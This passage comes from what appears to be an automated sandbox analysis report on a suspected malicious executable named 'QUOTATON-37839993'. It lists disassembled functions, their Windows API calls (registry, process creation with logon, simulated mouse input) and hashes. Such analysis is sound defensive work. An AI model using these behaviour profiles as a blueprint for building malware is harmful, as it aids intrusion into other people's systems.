                                                                      • __calloc_crt.LIBCMT ref: 00E29B19
                                                                      • __initptd.LIBCMT ref: 00E29B3B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E29B42
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                      • String ID:
                                                                      • API String ID: 3567560977-0
                                                                      • Opcode ID: 6f9f28684b29b7612e002590b9fd065b7e26c080460687c03884c713bf40eba2
                                                                      • Instruction ID: 0d2314b693a189f163108cd70adcea04f992fa0a29b1685b0c959d884dadb088
                                                                      • Opcode Fuzzy Hash: 6f9f28684b29b7612e002590b9fd065b7e26c080460687c03884c713bf40eba2
                                                                      • Instruction Fuzzy Hash: 58F0903251A7315EE6347775BC0768A26D0EF42734F203A5AF464F51D3EF21844145A8
                                                                      Function 00E8B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E8B644
                                                                      • _memset.LIBCMT ref: 00E8B653
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EC6F20,00EC6F64), ref: 00E8B682
                                                                      • CloseHandle.KERNEL32 ref: 00E8B694
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                      • String ID: o$do
                                                                      • API String ID: 3277943733-2180341428
                                                                      • Opcode ID: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
                                                                      • Instruction ID: 7cf954725c038dfbba0bbd56d732743806a7eeb321e48610e31fc1426f6cf79c
                                                                      • Opcode Fuzzy Hash: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
                                                                      • Instruction Fuzzy Hash: F2F05EB2640350BEE2102B62BC06FBB3A9CEB08395F005038FA0CF5192D7728C0587A8
                                                                      Function 00E2406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E23F85), ref: 00E24085
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00E2408C
                                                                      • EncodePointer.KERNEL32(00000000), ref: 00E24097
                                                                      • DecodePointer.KERNEL32(00E23F85), ref: 00E240B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                      • String ID: RoUninitialize$combase.dll
                                                                      • API String ID: 3489934621-2819208100
                                                                      • Opcode ID: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
                                                                      • Instruction ID: 7427d3fcf5f5f1b2006c784e4c25da70115cf127132f68bf1284cf784194d582
                                                                      • Opcode Fuzzy Hash: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
                                                                      • Instruction Fuzzy Hash: 10E092B0582300AFEA10AF73ED0DF453AA4BB04B46F14903AF205F10A0CBB786499B15
                                                                      Function 00E664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 3253778849-0
                                                                      • Opcode ID: d95287eae757dcb424553008273b04817afa5e8964500229668228a1b7bb8732
                                                                      • Instruction ID: 15200df926c48acf4cdd213463187e2d3bad1b4ad6ec2e86927c076e954fcf1a
                                                                      • Opcode Fuzzy Hash: d95287eae757dcb424553008273b04817afa5e8964500229668228a1b7bb8732
                                                                      • Instruction Fuzzy Hash: A5619A7090025A9BCF05EF60EC82AFE37A5AF05348F04A958F8567B2D3DB34A845CB50
                                                                      Function 00E801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E802BD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E802FD
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E80320
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E80349
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E8038C
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E80399
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                      • String ID:
                                                                      • API String ID: 4046560759-0
                                                                      • Opcode ID: 1f98df33b0c6cb7a08bb7a6302749873d681927ed645d681573836f83b699f76
                                                                      • Instruction ID: 5a4d0e071bcd54cfe14585b40aa7801066ca9f7783096f5b50fab4f72b3ea39d
                                                                      • Opcode Fuzzy Hash: 1f98df33b0c6cb7a08bb7a6302749873d681927ed645d681573836f83b699f76
                                                                      • Instruction Fuzzy Hash: 93515931108200AFC710EF64D885E6FBBE8FF85314F04591DF599A72A2DB31E949CB52
                                                                      Function 00E85799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenu.USER32(?), ref: 00E857FB
                                                                      • GetMenuItemCount.USER32(00000000), ref: 00E85832
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E8585A
                                                                      • GetMenuItemID.USER32(?,?), ref: 00E858C9
                                                                      • GetSubMenu.USER32(?,?), ref: 00E858D7
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E85928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                      • String ID:
                                                                      • API String ID: 650687236-0
                                                                      • Opcode ID: e99a5132d5f0dec457b6c00588b2e743ece86985107b86cc3980c585c379184e
                                                                      • Instruction ID: 5adf6bc4db34fe99b9c24c8a550c8afe003ac88dd22e34864cbe8c45950183d4
                                                                      • Opcode Fuzzy Hash: e99a5132d5f0dec457b6c00588b2e743ece86985107b86cc3980c585c379184e
                                                                      • Instruction Fuzzy Hash: 0D516E76E00615EFCF15EF64C8459AEB7F4EF48310F10506AE859BB392CB34AE418B90
                                                                      Function 00E5EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00E5EF06
                                                                      • VariantClear.OLEAUT32(00000013), ref: 00E5EF78
                                                                      • VariantClear.OLEAUT32(00000000), ref: 00E5EFD3
                                                                      • _memmove.LIBCMT ref: 00E5EFFD
                                                                      • VariantClear.OLEAUT32(?), ref: 00E5F04A
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E5F078
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                      • String ID:
                                                                      • API String ID: 1101466143-0
                                                                      • Opcode ID: 9f1ef02aca78842fe3ced804151d183dbfe679f8a12520355a734f4f81004040
                                                                      • Instruction ID: 1f5bbaf7c670f46ebebd75374c46c088a114981ec053a2eebbf29e72b61d9dbe
                                                                      • Opcode Fuzzy Hash: 9f1ef02aca78842fe3ced804151d183dbfe679f8a12520355a734f4f81004040
                                                                      • Instruction Fuzzy Hash: 8B516CB5A00209DFCB14CF58C884AAAB7B9FF4C314B15856AED59EB341E734E915CBA0
                                                                      Function 00E6220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E62258
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E622A3
                                                                      • IsMenu.USER32(00000000), ref: 00E622C3
                                                                      • CreatePopupMenu.USER32 ref: 00E622F7
                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00E62355
                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E62386
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                      • String ID:
                                                                      • API String ID: 3311875123-0
                                                                      • Opcode ID: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
                                                                      • Instruction ID: 162684595300cc8af454de4a8d9f1aa3ee2cd92d1db0a7e5e782e9e1d28aa4ae
                                                                      • Opcode Fuzzy Hash: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
                                                                      • Instruction Fuzzy Hash: 4451CF3068064ADFDF21CF68E888BADBBF4BF05398F10512DEA15B7290D3748944CB51
                                                                      Function 00E01765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E0179A
                                                                      • GetWindowRect.USER32(?,?), ref: 00E017FE
                                                                      • ScreenToClient.USER32(?,?), ref: 00E0181B
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E0182C
                                                                      • EndPaint.USER32(?,?), ref: 00E01876
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 1827037458-0
                                                                      • Opcode ID: a4a461cfd398bb981b2a8d43bfc127ae08815cef655ad925110eeb5cb9963081
                                                                      • Instruction ID: e5361cf423ba0006bd6d90a3744663c4ed8b4f2a4d8a147ef9023049b8a705c7
                                                                      • Opcode Fuzzy Hash: a4a461cfd398bb981b2a8d43bfc127ae08815cef655ad925110eeb5cb9963081
                                                                      • Instruction Fuzzy Hash: F841B131100300AFC714DF25DC88FAA7BE8EB45724F044279F699AA1F1C731A889DB61
                                                                      Function 00E8B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(00EC57B0,00000000,01014DD0,?,?,00EC57B0,?,00E8B5A8,?,?), ref: 00E8B712
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00E8B736
                                                                      • ShowWindow.USER32(00EC57B0,00000000,01014DD0,?,?,00EC57B0,?,00E8B5A8,?,?), ref: 00E8B796
                                                                      • ShowWindow.USER32(00000000,00000004,?,00E8B5A8,?,?), ref: 00E8B7A8
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00E8B7CC
                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E8B7EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
                                                                      • Instruction ID: d973f555af2bc583b5485cc10d16146556380cdf74bd01e29d429fac7c1647d2
                                                                      • Opcode Fuzzy Hash: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
                                                                      • Instruction Fuzzy Hash: 03417534600240AFDB22DF24C499B957BE1FF49314F5852BAE94CAF672C732A856CB50
                                                                      Function 00E7709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00E74E41,?,?,00000000,00000001), ref: 00E770AC
                                                                        • Part of subcall function 00E739A0: GetWindowRect.USER32(?,?), ref: 00E739B3
                                                                      • GetDesktopWindow.USER32 ref: 00E770D6
                                                                      • GetWindowRect.USER32(00000000), ref: 00E770DD
                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E7710F
                                                                        • Part of subcall function 00E65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC
                                                                      • GetCursorPos.USER32(?), ref: 00E7713B
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E77199
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                      • String ID:
                                                                      • API String ID: 4137160315-0
                                                                      • Opcode ID: 063107fdb35a2b728ed42a04ad106e0c7dd0f65fb417a8e74c17ee171b43f612
                                                                      • Instruction ID: 9f0a9ee602a05e3a59aa7ac9f2132a127ea03dbadd190c92f44a207a335bfdb7
                                                                      • Opcode Fuzzy Hash: 063107fdb35a2b728ed42a04ad106e0c7dd0f65fb417a8e74c17ee171b43f612
                                                                      • Instruction Fuzzy Hash: CA31B272609305AFD720DF14D849B9BB7E9FF88314F004919F589A7191DB70EA19CB92
                                                                      Function 00E58879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E580C0
                                                                        • Part of subcall function 00E580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E580CA
                                                                        • Part of subcall function 00E580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E580D9
                                                                        • Part of subcall function 00E580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E580E0
                                                                        • Part of subcall function 00E580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E580F6
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00E5842F), ref: 00E588CA
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E588D6
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E588DD
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E588F6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00E5842F), ref: 00E5890A
                                                                      • HeapFree.KERNEL32(00000000), ref: 00E58911
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      • Opcode ID: f50f169a31eb97d998c3865927ab2285b3a6d04a8a57fc795cb94fab51612277
                                                                      • Instruction ID: 7d15b3601cba6f70a9ea4cc0bf1b06b2170f4154a612d8acb6eba432abe5755f
                                                                      • Opcode Fuzzy Hash: f50f169a31eb97d998c3865927ab2285b3a6d04a8a57fc795cb94fab51612277
                                                                      • Instruction Fuzzy Hash: 4511B131501209FFDB149FA5DD09BBEB7A8EB84316F504428E849F7211CB32AD18DB60
                                                                      Function 00E585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E585E2
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E585E9
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E585F8
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00E58603
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E58632
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E58646
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
                                                                      • Instruction ID: fa7c500b49624219ef57875f2d857e169fb514a7bf048eb022d59f124120b83f
                                                                      • Opcode Fuzzy Hash: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
                                                                      • Instruction Fuzzy Hash: 70115972501209AFDF018FA5DE49BEE7BA9EF08309F144065FE04B2160C7728E68EB60
                                                                      Function 00E5B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00E5B7B5
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E5B7C6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E5B7CD
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00E5B7D5
                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E5B7EC
                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00E5B7FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 78786a452a3d320577c07605b81b9cbef155830014dad882a15da44fc49e91f2
                                                                      • Instruction ID: 5f4a21d749995b0938b4d6a5e553709e6358604d75bbfec0d6baa5a6205b68f3
                                                                      • Opcode Fuzzy Hash: 78786a452a3d320577c07605b81b9cbef155830014dad882a15da44fc49e91f2
                                                                      • Instruction Fuzzy Hash: 6F018475E00209BFEF109BA69C49A5EBFB8EB48351F0041B6FE08B7291D6309C14CF90
                                                                      Function 00E20162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20193
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2019B
